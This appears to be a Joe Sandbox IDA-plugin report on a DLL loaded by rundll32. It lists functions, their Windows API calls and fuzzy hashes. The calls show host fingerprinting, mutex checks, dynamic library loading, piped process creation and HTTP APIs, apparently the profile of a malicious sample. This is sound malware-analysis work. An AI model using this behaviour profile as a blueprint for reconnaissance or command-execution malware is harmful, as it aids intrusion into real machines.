Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: Internet$AddressProc$Option$CloseHandleHttpRequest$ErrorFileHeapLastOpenProcessReadSend$ConnectLibraryLoadQuery
String ID: `
API String ID: 843668234-1850852036
Opcode ID: dbe71b7234fd1478b9a77ea2ff194bf8d90bbe6568d46497f724265beefaff61
Instruction ID: 7c38a914e1615d8b8a6a3f3696c2c871ca3545b0b2d2c5faba682ef09bad2dd5
Opcode Fuzzy Hash: dbe71b7234fd1478b9a77ea2ff194bf8d90bbe6568d46497f724265beefaff61
Instruction Fuzzy Hash: CBE12765B0DF4282EA50DB53A8506BA63A2BF8AFB0F4441F6DA4E43B65DE3CE445C740

Function 00007FFE1A5145E0 Relevance: 19.7, APIs: 13, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNEL32 ref: 00007FFE1A514637
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514647
GetComputerNameW.KERNEL32 ref: 00007FFE1A51465C
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514664
GetComputerNameExW.KERNEL32 ref: 00007FFE1A514686
GetModuleHandleW.KERNEL32 ref: 00007FFE1A51468E
GetUserNameW.ADVAPI32 ref: 00007FFE1A5146A6
GetModuleHandleW.KERNEL32 ref: 00007FFE1A5146AE
OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: Handle$Module$Name$Computer$CloseCountInformationMutexOpenSleepTickUserVolume
String ID:
API String ID: 2838846479-0
Opcode ID: a7d98a780d92d368d99f5791a47d12559dcb0c590ddaab72dbf075023832e14a
Instruction ID: bc62318b6e87c6d25a67ffc317e078783354712d0c42f44f403672b8fce2508e
Opcode Fuzzy Hash: a7d98a780d92d368d99f5791a47d12559dcb0c590ddaab72dbf075023832e14a
Instruction Fuzzy Hash: DBB18072B08E4296EB10DB72E8402BD37A6FB46B68F4441B6DA5E47BA5DF3CD145CB00

Function 00007FFE1A515A20 Relevance: 16.7, APIs: 11, Instructions: 178
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 00007FFE1A515A50
GetProcAddress.KERNEL32 ref: 00007FFE1A515A88
LoadLibraryW.KERNEL32 ref: 00007FFE1A515AB9
GetProcAddress.KERNEL32 ref: 00007FFE1A515AF1
GetProcAddress.KERNEL32 ref: 00007FFE1A515B29
LoadLibraryW.KERNEL32 ref: 00007FFE1A515B5A
GetProcAddress.KERNEL32 ref: 00007FFE1A515B92
RtlGetVersion.NTDLL ref: 00007FFE1A515BC6
GetNativeSystemInfo.KERNEL32 ref: 00007FFE1A515BF9
GetSystemInfo.KERNEL32 ref: 00007FFE1A515BFD

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad$InfoSystem$NativeVersion
String ID:
API String ID: 2883576749-0
Opcode ID: edaa7cecb2ce61e8d08a04a1f2505cbfd62d8f4ea06d9fe782e15e0f68590704
Instruction ID: 2dcca754f253edd7987110c07b1097a0600fc2b59e9085e1db41eab5e1ea3669
Opcode Fuzzy Hash: edaa7cecb2ce61e8d08a04a1f2505cbfd62d8f4ea06d9fe782e15e0f68590704
Instruction Fuzzy Hash: 3A912A20B0CE4696FA648B62E8547B96392EF86F78F5804F7D54E82AB1DF7CE444C710

Function 00007FFE1A5113A0 Relevance: 12.1, APIs: 8, Instructions: 120
libraryloaderfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 00007FFE1A5113D7
GetProcAddress.KERNEL32 ref: 00007FFE1A51140E
GetProcAddress.KERNEL32 ref: 00007FFE1A511445
GetProcAddress.KERNEL32 ref: 00007FFE1A51147C
sprintf_s.LIBCMTD ref: 00007FFE1A5114B3
FindFirstFileW.KERNEL32 ref: 00007FFE1A5114CD
FindNextFileW.KERNEL32 ref: 00007FFE1A511562
FindClose.KERNEL32 ref: 00007FFE1A51157F

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressFindProc$File$CloseFirstLibraryLoadNextsprintf_s
String ID:
API String ID: 3482909146-0
Opcode ID: 22d0c2b1a28d00ed540bf15ff744353af3ceb3754b5d0a5077885d68ed8e5c0d
Instruction ID: 40605b5492ab324c763ff5dea8500622adcef45ab039e1512dd2b98e31ff3b29
Opcode Fuzzy Hash: 22d0c2b1a28d00ed540bf15ff744353af3ceb3754b5d0a5077885d68ed8e5c0d
Instruction Fuzzy Hash: F2513661B1DF4290EA50DB63A8141B922A2BF96FB4F4441FBD95E437B6EF2CE845C310

Function 00007FFE1A511870 Relevance: 6.0, APIs: 4, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A511354), ref: 00007FFE1A51188C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A511354), ref: 00007FFE1A5118B2
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A511354), ref: 00007FFE1A5118CD
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A511354), ref: 00007FFE1A5118DE

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProc
String ID:
API String ID: 3433367815-0
Opcode ID: ecfc0f5c20cdda23f03c0372d60a1f9a9daa0108346c0d72a78978d45894affb
Instruction ID: 2e9cd15faf9898095d130fd6d725dd2add3f7cd15b708ae276aba9364da2d8c2
Opcode Fuzzy Hash: ecfc0f5c20cdda23f03c0372d60a1f9a9daa0108346c0d72a78978d45894affb
Instruction Fuzzy Hash: 38F0F425B1DA4692E900DB67F554079A3A2BF4AFE4F8401F6D94E43765DE2CE444C610

Function 00007FFE1A517BB0 Relevance: 10.6, APIs: 7, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517BDF
GetProcAddress.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C16
LoadLibraryW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C46
GetProcAddress.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C7D
GetCommandLineW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C92
CommandLineToArgvW.SHELL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517CA0
LocalFree.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517D0E

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressCommandLibraryLineLoadProc$ArgvFreeLocal
String ID:
API String ID: 1914251671-0
Opcode ID: 055a219286a0850f7018c79609365c8502faa3a2cecd4e08f0dab71379c2a6f4
Instruction ID: 9c02ad0faa51ac0fd36f8935ebe1822431097d76edab3907c28cce7eccde9721
Opcode Fuzzy Hash: 055a219286a0850f7018c79609365c8502faa3a2cecd4e08f0dab71379c2a6f4
Instruction Fuzzy Hash: AF410624F1DF0281EA50DB57B86417926A2AF9AFB4F8440F7D94E43776EE3CE485C600

Function 00007FFE1A514B50 Relevance: 7.7, APIs: 5, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Part of subcall function 00007FFE1A511C40: LoadLibraryExW.KERNEL32 ref: 00007FFE1A511C8C
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CC3
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CFA
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D31
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D68
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D9F
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511DD6
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511E0D

Part of subcall function 00007FFE1A5159F0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159F9

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$Handle$CloseCountHeapLibraryLoadModuleMutexOpenProcessSleepTick
String ID:
API String ID: 2080402659-0
Opcode ID: d16eecc91746005fe88b48e1243f16a1d3d0187000c98afbb7822189259a7abf
Instruction ID: 12abf0d4866c81ec13aeadc28283c1bbc69b674d2d3038ea213757bcf361c4de
Opcode Fuzzy Hash: d16eecc91746005fe88b48e1243f16a1d3d0187000c98afbb7822189259a7abf
Instruction Fuzzy Hash: 51716171B0CA4186EB10DB22E4406B977A5FB46BB4F5402B6DA6E07BE6DF3CE445CB00

Function 00007FFE1A514A6D Relevance: 7.6, APIs: 5, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Part of subcall function 00007FFE1A511C40: LoadLibraryExW.KERNEL32 ref: 00007FFE1A511C8C
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CC3
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CFA
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D31
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D68
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D9F
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511DD6
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511E0D

Part of subcall function 00007FFE1A5159F0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159F9

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$Handle$CloseCountHeapLibraryLoadModuleMutexOpenProcessSleepTick
String ID:
API String ID: 2080402659-0
Opcode ID: db2c93b9a8bb71eed27fe1124890a34b3e5ad34da3d0b448050d87d654aa9ec2
Instruction ID: a86c542efb82d9c043aac7ec23fb9411b15ea6750974b0dc5bb1fc23b58b9cfd
Opcode Fuzzy Hash: db2c93b9a8bb71eed27fe1124890a34b3e5ad34da3d0b448050d87d654aa9ec2
Instruction Fuzzy Hash: C7617471B0CB4186EB10DB22E4442BA77A6FB46BA8F5401B7DA5E47BA6DF3CD045CB00

Function 00007FFE1A5149A3 Relevance: 7.6, APIs: 5, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Part of subcall function 00007FFE1A511C40: LoadLibraryExW.KERNEL32 ref: 00007FFE1A511C8C
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CC3
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CFA
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D31
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D68
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D9F
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511DD6
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511E0D

Part of subcall function 00007FFE1A5159F0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159F9

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$Handle$CloseCountHeapLibraryLoadModuleMutexOpenProcessSleepTick
String ID:
API String ID: 2080402659-0
Opcode ID: 7a580459977b9964d557fef637bfe6f08bfa79b23d7ecff0e220c8c46af59cf3
Instruction ID: c9db24f93a36093d6618c5c6e13b0df828505da16603e9d7fcd0518137dfb195
Opcode Fuzzy Hash: 7a580459977b9964d557fef637bfe6f08bfa79b23d7ecff0e220c8c46af59cf3
Instruction Fuzzy Hash: A2516271B0CF4286EA10DB22E4442B977A6FB46BA4F5441B7DA5D47BA6DF3CE045CB00

Function 00007FFE1A51497C Relevance: 7.6, APIs: 5, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A513020: GetModuleHandleW.KERNEL32 ref: 00007FFE1A5130ED

OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Part of subcall function 00007FFE1A511C40: LoadLibraryExW.KERNEL32 ref: 00007FFE1A511C8C
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CC3
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CFA
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D31
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D68
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D9F
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511DD6
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511E0D

Part of subcall function 00007FFE1A5159F0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159F9

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$Handle$Module$CloseCountHeapLibraryLoadMutexOpenProcessSleepTick
String ID:
API String ID: 2321454388-0
Opcode ID: ea4f16c014b59073cc8f5d6b610da928ceb4e233ce794afe2b6dee2f5f9978f3
Instruction ID: 649ca98f836f71429c3237e473faf362a82ea6cc600903029bf3b4057d58c426
Opcode Fuzzy Hash: ea4f16c014b59073cc8f5d6b610da928ceb4e233ce794afe2b6dee2f5f9978f3
Instruction Fuzzy Hash: EB516271B0CF4286EA10DB22E4442B977A6FB46BA4F5441B7DA5D47BA6DF3CE045CB00

Function 00007FFE1A5149CA Relevance: 7.6, APIs: 5, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A513F30: CreatePipe.KERNEL32 ref: 00007FFE1A513F90
Part of subcall function 00007FFE1A513F30: SetHandleInformation.KERNEL32 ref: 00007FFE1A513FB2
Part of subcall function 00007FFE1A513F30: sprintf_s.LIBCMTD ref: 00007FFE1A51406B
Part of subcall function 00007FFE1A513F30: GetCurrentDirectoryW.KERNEL32 ref: 00007FFE1A514084
Part of subcall function 00007FFE1A513F30: CreateProcessW.KERNEL32 ref: 00007FFE1A5140C9
Part of subcall function 00007FFE1A513F30: WaitForSingleObject.KERNEL32 ref: 00007FFE1A5140E1

OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Part of subcall function 00007FFE1A511C40: LoadLibraryExW.KERNEL32 ref: 00007FFE1A511C8C
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CC3
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CFA
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D31
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D68
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D9F
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511DD6
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511E0D

Part of subcall function 00007FFE1A5159F0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159F9

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$Handle$CreateProcess$CloseCountCurrentDirectoryHeapInformationLibraryLoadModuleMutexObjectOpenPipeSingleSleepTickWaitsprintf_s
String ID:
API String ID: 3732969655-0
Opcode ID: ba4f6bc2ec75780c302ac81e3c307eb0cf5cf99330ae4b9c9c1729213cce2c26
Instruction ID: 23b3124ae234e110fd2eff781e7c08ebcbf80b720ea30afc79de8157ed66091b
Opcode Fuzzy Hash: ba4f6bc2ec75780c302ac81e3c307eb0cf5cf99330ae4b9c9c1729213cce2c26
Instruction Fuzzy Hash: 66516371B0CB4286EB10DB22E4442BA77A6FB46BA4F5401B7DA5D47BA6DF3CD145CB00

Function 00007FFE1A5148E2 Relevance: 7.6, APIs: 5, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A512C40: WSAStartup.WS2_32 ref: 00007FFE1A512C84
Part of subcall function 00007FFE1A512C40: gethostname.WS2_32 ref: 00007FFE1A512C95
Part of subcall function 00007FFE1A512C40: gethostbyname.WS2_32 ref: 00007FFE1A512CA4
Part of subcall function 00007FFE1A512C40: GetModuleHandleW.KERNEL32 ref: 00007FFE1A512CBF
Part of subcall function 00007FFE1A512C40: inet_ntoa.WS2_32 ref: 00007FFE1A512CC7
Part of subcall function 00007FFE1A512C40: RegOpenKeyExW.ADVAPI32 ref: 00007FFE1A512D1B
Part of subcall function 00007FFE1A512C40: RegEnumKeyExW.ADVAPI32 ref: 00007FFE1A512D69
Part of subcall function 00007FFE1A512C40: RegOpenKeyExW.ADVAPI32 ref: 00007FFE1A512D9F
Part of subcall function 00007FFE1A512C40: RegQueryValueExW.ADVAPI32 ref: 00007FFE1A512DD2
Part of subcall function 00007FFE1A512C40: RegCloseKey.ADVAPI32 ref: 00007FFE1A512DE1

OpenMutexW.KERNEL32 ref: 00007FFE1A514CF5
CloseHandle.KERNEL32 ref: 00007FFE1A514D0E
GetModuleHandleW.KERNEL32 ref: 00007FFE1A514D25
GetTickCount.KERNEL32 ref: 00007FFE1A514D2B
SleepEx.KERNEL32 ref: 00007FFE1A514D3C

Part of subcall function 00007FFE1A511C40: LoadLibraryExW.KERNEL32 ref: 00007FFE1A511C8C
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CC3
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511CFA
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D31
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D68
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511D9F
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511DD6
Part of subcall function 00007FFE1A511C40: GetProcAddress.KERNEL32 ref: 00007FFE1A511E0D

Part of subcall function 00007FFE1A5159F0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159F9

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleOpen$CloseModule$CountEnumHeapLibraryLoadMutexProcessQuerySleepStartupTickValuegethostbynamegethostnameinet_ntoa
String ID:
API String ID: 51037661-0
Opcode ID: a6862768191938aedb4d2179c42331d9c76e41a9b2bf2ef8ecb1b2155ce9b823
Instruction ID: 9b6caedba9914daebfbf5a33b73cae439de0abebc53bc245df403c4e70dc5812
Opcode Fuzzy Hash: a6862768191938aedb4d2179c42331d9c76e41a9b2bf2ef8ecb1b2155ce9b823
Instruction Fuzzy Hash: 29515271B0CF4286EA10DB22E8442BA77A6FB46BA4F5441B7DA5D47BA5DF3CE045CB00

Function 00007FFE1A514C35 Relevance: 7.6, APIs: 5, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A5168A0: LoadLibraryW.KERNEL32 ref: 00007FFE1A5168E5
Part of subcall function 00007FFE1A5168A0: GetProcAddress.KERNEL32 ref: 00007FFE1A51690B
Part of subcall function 00007FFE1A5168A0: GetTempPathW.KERNEL32 ref: 00007FFE1A516928
Part of subcall function 00007FFE1A5168A0: GetTempFileNameW.KERNEL32 ref: 00007FFE1A516946
Part of subcall function 00007FFE1A5168A0: DeleteFileW.KERNEL32 ref: 00007FFE1A516953
Part of subcall function 00007FFE1A5168A0: GetTempFileNameW.KERNEL32 ref: 00007FFE1A516990
